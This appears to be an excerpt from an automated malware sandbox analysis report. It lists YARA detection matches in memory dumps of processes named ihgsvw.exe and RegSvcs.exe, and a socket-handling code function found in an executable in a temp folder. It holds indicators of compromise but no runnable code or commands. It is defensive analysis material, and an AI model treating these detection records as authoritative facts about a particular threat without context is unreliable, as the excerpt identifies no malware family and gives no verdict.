Source: Yara match File source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C22163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 6_2_00C22163